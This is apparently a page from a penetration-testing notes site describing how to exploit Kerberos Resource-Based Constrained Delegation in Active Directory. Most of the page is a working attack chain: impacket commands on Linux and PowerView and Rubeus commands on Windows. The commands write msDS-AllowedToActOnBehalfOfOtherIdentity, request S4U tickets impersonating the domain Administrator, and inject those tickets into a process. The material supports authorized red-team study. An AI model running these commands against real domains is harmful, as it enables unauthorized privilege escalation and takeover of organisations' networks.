Resource-Based Constrained Delegation

Resource-Based Constrained Delegation is a feature in Kerberos authentication where a computer trusts another account to impersonate users to it (e.g., ComputerA allows ComputerB to impersonate any user and authenticate to ComputerA as that user).

Attribute: msDS-AllowedToActOnBehalfOfOtherIdentity

To exploit Resource-Based Constrained Delegation, you need a few prerequisites:

Control over a user or computer account with a SPN (ComputerA or UserA)
Permissions to modify the msDS-AllowedToActOnBehalfOfOtherIdentity attribute for ComputerB (the target computer you want access to)

Exploit

Scenario

You control ComputerA and a domain user account, ducky, who has WriteProperty permissions for ComputerB.

The goal is to make ComputerB trust ComputerA for delegation so that a ST for ducky -> ComputerA can be used in S4U2Proxy to obtain a ST for ducky -> ComputerB.

GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.GitHub

Linux (Attacker)

## Add the msDS-AllowedToActOnBehalfOfOtherIdentity attribute to Computer B
## to allow delegation from Computer A
rbcd.py -delegate-from 'ComputerA$' -delegate-to 'ComputerB$' -dc-ip '[DC IP]' -action 'write' '[domain]/ducky:Password'

## Read the msDS-AllowedToActOnBehalfOfOtherIdentity attribute to confirm it
rbcd.py -delegate-to 'ComputerB$' -dc-ip '[DC IP]' -action 'read' '[domain]/ducky:Password'

## Obtain a ST using credentials for ComputerA$ impersonating built-in Administrator
getST.py -spn 'cifs/ComputerB$' -impersonate Administrator -dc-ip '[DC IP]' '[domain]/ComputerA$:Password'

GitHub - GhostPack/Rubeus: Trying to tame the three-headed dog.GitHub

PowerSploit/Recon/PowerView.ps1 at master · PowerShellMafia/PowerSploitGitHub

GitHub - S3cur3Th1sSh1t/SharpImpersonation: A User Impersonation tool - via Token or Shellcode injectionGitHub

Windows

## Get SID of ComputerA
Get-DomainComputer -Identity ComputerA -Properties objectSid

## Build the raw binary value for msDS-AllowedToActOnBehalfOfOtherIdentity
## using ComputerA's SID
$rsd = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;[ComputerA's SID])"
$rsdb = New-Object byte[] ($rsd.BinaryLength)
$rsd.GetBinaryForm($rsdb, 0)

## Write the msDS-AllowedToActOnBehalfOfOtherIdentity attribute onto ComputerB
$rsd = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;[ComputerA's SID])"
$rsdb = New-Object byte[] ($rsd.BinaryLength)
$rsd.GetBinaryForm($rsdb, 0)
Get-DomainComputer -Identity "ComputerB" | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $rsdb}

## Read the msDS-AllowedToActOnBehalfOfOtherIdentity attribute to confirm it
Get-DomainComputer -Identity "ComputerB" -Properties msDS-AllowedToActOnBehalfOfOtherIdentity

## Request TGT for ComputerA$
Rubeus.exe asktgt /user:ComputerA$ /rc4:[NTLM password hash for ComputerA] /nowrap

## S4U2Self and S4U2Proxy to get ST as Administrator for ComputerB
Rubeus.exe s4u /user:ComputerA$ /impersonateuser:Administrator /msdsspn:cifs/ComputerB.weelee.zip /ticket [ComputerA TGT] /nowrap

## Inject the newly obtained ST as Administrator for ComputerB into a new process
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:[domain] /username:Administrator /password:AnyPassword /ticket:[ComputerB ST]

## Use A Tool To Impersonate The Process Created Above
Invoke-SharpImpersonation -Command "pid:[pid]"

PreviousConstrained Delegation NextUnPAC The Hash

Last updated 12 days ago

hashtagExploit

hashtagScenario

Exploit

Scenario